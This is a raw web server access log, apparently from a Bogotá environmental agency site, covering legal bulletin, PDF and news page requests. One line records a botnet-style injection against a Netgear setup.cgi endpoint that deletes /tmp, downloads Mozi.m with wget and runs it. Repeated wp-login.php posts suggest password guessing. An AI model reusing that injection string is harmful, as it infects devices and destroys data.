172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [05/Mar/2023:07:41:59 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1308
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [05/Mar/2023:07:42:03 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
201.245.192.253 - - [05/Mar/2023:07:42:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
185.119.81.96 - - [05/Mar/2023:07:42:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [05/Mar/2023:07:42:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [05/Mar/2023:07:42:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=6952&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 1048
172.22.2.4 - - [05/Mar/2023:07:42:54 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.58.60.135 - - [05/Mar/2023:07:42:59 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.58.60.135 - - [05/Mar/2023:07:42:59 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.58.60.135 - - [05/Mar/2023:07:42:59 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.58.60.135 - - [05/Mar/2023:07:42:59 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
181.58.60.135 - - [05/Mar/2023:07:42:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.58.60.135 - - [05/Mar/2023:07:43:02 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
181.58.60.135 - - [05/Mar/2023:07:43:02 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
181.58.60.135 - - [05/Mar/2023:07:43:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 278412
64.124.8.48 - - [05/Mar/2023:07:43:03 -0500] "-" 408 -
172.22.2.4 - - [05/Mar/2023:07:41:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.58.60.135 - - [05/Mar/2023:07:43:18 -0500] "GET /BLA/resoluciones/AUTOS%202010/6952.pdf HTTP/1.1" 200 237500
172.22.2.4 - - [05/Mar/2023:07:41:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40876
172.22.2.4 - - [05/Mar/2023:07:42:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46392
181.59.3.177 - - [05/Mar/2023:07:45:23 -0500] "GET /distrito-levanta-alerta-fase-1-por-calidad-del-aire-en-bogota-llamado-a-no-bajar-la-guardia-y-seguir-reduciendo-emisiones.html HTTP/1.1" 200 908
173.252.87.117 - - [05/Mar/2023:07:45:35 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [05/Mar/2023:07:45:44 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.19 - - [05/Mar/2023:07:47:02 -0500] "GET /el-plan-de-accion-climatica-de-bogota-inspirador-para-otras-ciudades-del-mundo.html HTTP/1.1" 206 876
201.245.192.253 - - [05/Mar/2023:07:47:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
173.252.83.118 - - [05/Mar/2023:07:47:16 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:07:47:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:07:48:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
190.60.254.231 - - [05/Mar/2023:07:50:33 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
190.60.254.231 - - [05/Mar/2023:07:50:33 -0500] "GET /favicon.ico HTTP/1.1" 404 1422
216.245.221.92 - - [05/Mar/2023:07:50:44 -0500] "HEAD / HTTP/1.1" 200 -
157.90.254.89 - - [05/Mar/2023:07:51:06 -0500] "GET / HTTP/1.1" 200 4720
157.90.254.89 - - [05/Mar/2023:07:51:09 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [05/Mar/2023:07:52:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
64.124.8.48 - - [05/Mar/2023:07:54:02 -0500] "-" 408 -
172.22.2.4 - - [05/Mar/2023:07:53:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:07:54:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
216.245.221.92 - - [05/Mar/2023:07:55:44 -0500] "HEAD / HTTP/1.1" 200 -
173.252.87.12 - - [05/Mar/2023:07:55:44 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [05/Mar/2023:07:57:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
185.119.81.96 - - [05/Mar/2023:07:57:09 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [05/Mar/2023:07:57:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.251 - - [05/Mar/2023:07:57:38 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/pieza-dia-mundial-general-tinguas-8-mayo-1024x576.jpg HTTP/1.1" 200 84713
185.119.81.104 - - [05/Mar/2023:07:59:00 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [05/Mar/2023:07:59:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [05/Mar/2023:07:59:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Mar/2023:08:00:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:01:02 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [05/Mar/2023:07:59:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
186.102.45.233 - - [05/Mar/2023:08:01:49 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
172.22.2.4 - - [05/Mar/2023:08:01:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
186.102.45.233 - - [05/Mar/2023:08:01:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 886776
201.245.192.253 - - [05/Mar/2023:08:01:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
186.102.45.233 - - [05/Mar/2023:08:02:23 -0500] "GET /BLA/resoluciones/AUTOS%202014/1031.pdf HTTP/1.1" 200 389707
34.141.210.78 - - [05/Mar/2023:08:02:31 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.102.45.233 - - [05/Mar/2023:08:02:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 327873
186.102.45.233 - - [05/Mar/2023:08:02:50 -0500] "GET /BLA/resoluciones/AUTOS%202016/1031.pdf HTTP/1.1" 200 265432
223.149.248.236 - - [05/Mar/2023:08:03:37 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
173.252.111.23 - - [05/Mar/2023:08:04:34 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
52.167.144.47 - - [05/Mar/2023:08:05:03 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [05/Mar/2023:08:05:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [05/Mar/2023:08:05:44 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.154 - - [05/Mar/2023:08:05:48 -0500] "-" 408 -
173.252.87.17 - - [05/Mar/2023:08:05:53 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
185.119.81.96 - - [05/Mar/2023:08:05:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [05/Mar/2023:08:05:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
186.119.104.15 - - [05/Mar/2023:08:05:56 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
173.252.111.7 - - [05/Mar/2023:08:06:10 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
199.16.157.182 - - [05/Mar/2023:08:06:27 -0500] "GET /images/1%20de%20febrer%20Operativo%20hornos.jpg HTTP/1.1" 200 69569
172.22.2.4 - - [05/Mar/2023:08:04:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:08:06:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:08:05:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
181.53.13.142 - - [05/Mar/2023:08:07:42 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Qnce+VoUEA3uGH2rZH23kAUS/6ECo+v77BhAmXR2Y4Kel+zXwcCwu&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 30
181.53.13.142 - - [05/Mar/2023:08:07:43 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+KEuIiDflXYR/1QTyh7y3ferDmjdiQkigL9cybYlb9F0GdtWLwxt4sl22jp1mpu51JlIhuZ2x4WsKfJGrdSMoBIbjZ97T4G/o=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 97
181.53.13.142 - - [05/Mar/2023:08:07:43 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/8doP8oK95UF4oEKvzLTKJw+VMRe+DgjmSHp0g5PeW7gh5GpNo3X+a1dbu43mG1dj9nALI01y89XaEs1vxynhOBfpjaE7k0D1YbQ+Xy59ucF1YUjdJ2y6usfaUcV4IN7GRCzl5x39ACp5idcdM8cJN1b6nU4KySRrPAKo6cK8nunI/WvWpYHEeFgGQS2QAjllv7S7IVcPRDJehUjuHkbCG5eRVhtSekYLrZQxAMOaQTWbnslEFrcgrkr32NsD7ZrrNYZdmMZwej0Clh2jeM2dgldjlz11aE/ZC44k2u54zjmfaIR+SCxjoPLVwThbj0zQIQZUa1Zm35gGlFAm9JmDjMDjXRc9he1dxqZ4Xb21hWFWP603FcWOmu/YLcOVPwBqst4qV0S5hJ1xywPQPy7wYbkk2U/P7CDwrlgFTrM1I+BW8rNY+OI2b5Qs34fVvQKR+s3XJmfMJmXd1/clyyWirO7a07eePum9eLeNz4wS8JHuADOXu1hWBNH+GP/At0fun3npb5zevE2oJKcFpQ+ew2C6FNzXNRb+vBDEWb2nG2R+a+qAo2ga4A9bNkmIFW0jf/GWmAFdgZkjqFDJfZZwpf6xrvNB+pheBcQmHADcLXx/RDVBLPRVqCdSHUPItdvtMPWPWuCBrcaHZv8LeA2w7dyZ+tHsEUH4pEhApuJ7yzkNdyqekGzUESxQoowfA0oQ+eYMOcIDHOW4kF/hSVxn4YJqgiVHIS+NOEDOGphXQwDLaX3qm3+1pfu6QD6ZKeY+4jkymtelrpADuNV/KX74wcmI7mZZZSn0QpRaGR55rmicuMDLC3fX0r0N/46hCivFBXLoH2g3FyUwf8D6XhN4Tj8rzB3awlmm1NnBNTRvN1i5L/LRL7afH+F1R+N4qBzju2wznLaXIxo/R1zQOLLwJ86yKQ2OFItLlwyoCy6AcoDk0j2H8EqSqoHXBuxo7Hl5DFh1J4qLrYAK/MDqqg+65ICJXm+hTmC2P+RgRVX9inRVAVvbivFcMNa0m87DpKPl0Z4tvycCR7IUNTwHiVW9XLbAgVBDFG1fykFyQPod/3qHtANdDIcELT9aYzz2o5fPyzytfOzCEHP+GA2Q7KfUVcH2gbI6xLhSYaUi9/JZ2sW6SEJuyv78L3FR0A07WPvBMPStO0UplZ2H7HZEwo4q2JCyJCLZGbSKL7ZpYUsuc6PDzQpSsvmKYEkrtsAqHUn6Mz41tctNVDcKWnCW3TGQH4pdgeoyRAk4O0vi75oARrAa7Ah+RVYmi9TbtHPItwgcqa0El3kMonPvRSxY8EpQTfKhu8yEnw56rU8wxzO8PuNIev8MT0f6WPyCN5ZH4Ei+27TVjeSaJLXNUxwpy05HWxGFd8cGMc0LFOSMjWXOTc5rnbs/oHrO8f8mFPNmlGNuEVSbxIZw/Iku21sqZ9NgoR75X+5AloQs=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 863
181.53.13.142 - - [05/Mar/2023:08:07:43 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19tqYHo8t2/ykyKP8JTF3VsocEKnWX1L0XmZdvlpaVSMm5znarIUYrc9PM5N19NkGIuY2mhvuTR7Iwp2EurI87AXQ0bUD/vVLh8eRIoR8JucUzSu1C+9NQsoHvECrwTUMsnJBQSFzdLWLhgq+peAER2CdTvIjwnZQuzx4kimA/4ddVb9ivGi9m5CZoepQbhsg9Z58iGU4Rq4y625BGtqT9XVUl9syXsPRDHwzkG/FYZ4tkbFjGpGqDNNZq/t/lN5vAF8/j7x89lBN9FTn2EsJd7rbKCNs0yaR7+9UoDsUHE7vP6HRhJYnSfaBRdNYHH90hxchC1NZs5J11GnL9ikXo/aiy18wpSgqk=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 196
181.53.13.142 - - [05/Mar/2023:08:07:43 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Qnce+VoUEA3uGH2rZH23kAUS/6ECo+v77BhAmXR2Y4Kel+zXwcCwu HTTP/1.1" 200 31032
173.252.87.12 - - [05/Mar/2023:08:07:45 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
35.204.208.114 - - [05/Mar/2023:08:08:04 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [05/Mar/2023:08:10:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:10:51 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
173.252.95.1 - - [05/Mar/2023:08:11:55 -0500] "GET /images/Conversatorio%20aire%201%20(1).jpeg HTTP/1.1" 200 72040
173.252.127.116 - - [05/Mar/2023:08:11:55 -0500] "GET /images/Juan%20Rey%20febrero%2013.jpg HTTP/1.1" 200 55934
173.252.95.24 - - [05/Mar/2023:08:11:55 -0500] "GET /images/WhatsApp%20Image%202023-02-15%20at%205.07.25%20PM.jpeg HTTP/1.1" 200 50573
201.245.192.253 - - [05/Mar/2023:08:11:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
173.252.79.19 - - [05/Mar/2023:08:12:12 -0500] "GET /images/1%20de%20febrer%20Operativo%20hornos.jpg HTTP/1.1" 200 69569
172.22.2.4 - - [05/Mar/2023:08:10:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.8 - - [05/Mar/2023:08:12:32 -0500] "GET /images/IMG_3028%20(1).jpg HTTP/1.1" 200 435206
200.118.61.71 - - [05/Mar/2023:08:12:34 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
172.22.2.4 - - [05/Mar/2023:08:11:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
69.63.184.3 - - [05/Mar/2023:08:13:26 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
172.22.2.4 - - [05/Mar/2023:08:14:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:48 -0500] "OPTIONS /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/button.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/0.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [05/Mar/2023:08:14:49 -0500] "OPTIONS /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:15:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=SILVICULTURA&fecha=2022&resuelve= HTTP/1.1" 200 225635
172.22.2.4 - - [05/Mar/2023:08:15:04 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [05/Mar/2023:08:15:04 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
186.84.90.1 - - [05/Mar/2023:08:15:34 -0500] "GET /BLA/resoluciones/AUTOS%202022/7328.pdf HTTP/1.1" 200 803919
216.245.221.92 - - [05/Mar/2023:08:15:44 -0500] "HEAD / HTTP/1.1" 200 -
35.204.129.15 - - [05/Mar/2023:08:15:46 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.84.90.1 - - [05/Mar/2023:08:16:12 -0500] "GET /BLA/resoluciones/AUTOS%202022/7182.pdf HTTP/1.1" 200 466697
173.252.111.119 - - [05/Mar/2023:08:16:33 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [05/Mar/2023:08:16:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
201.245.192.253 - - [05/Mar/2023:08:17:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40696
201.245.192.253 - - [05/Mar/2023:08:17:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42557
172.22.2.4 - - [05/Mar/2023:08:16:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:08:17:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
181.49.162.58 - - [05/Mar/2023:08:19:11 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.49.162.58 - - [05/Mar/2023:08:19:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.48.162.206 - - [05/Mar/2023:08:19:11 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.53.13.142 - - [05/Mar/2023:08:19:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+g+B2BeyzuhyCIyvoQbn/mrOJ0PxiWH4pDcskNtUV4oUgqLsByd3gJcX9Fy9ThuncKv8CVDJt70ILkqnAXvuVNZjgyHJfwJ3Ai/NGn1Hpz8+uBILIm3SRZ0/qQlL5oGahjD1/glympTKJnQFDbRF5urhVPQKOqhE2a87XMtuWvfnDhRpCRNfgWApWduKjTsIlUKyO5MF0c1rkkGktHCvqKsQy4q/R6XTR+Bk6hki5SadYLxlfhcZP8RXgotzXEHnC29OOobX/qghvqAy+d4kzbmbapUSaWqU=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
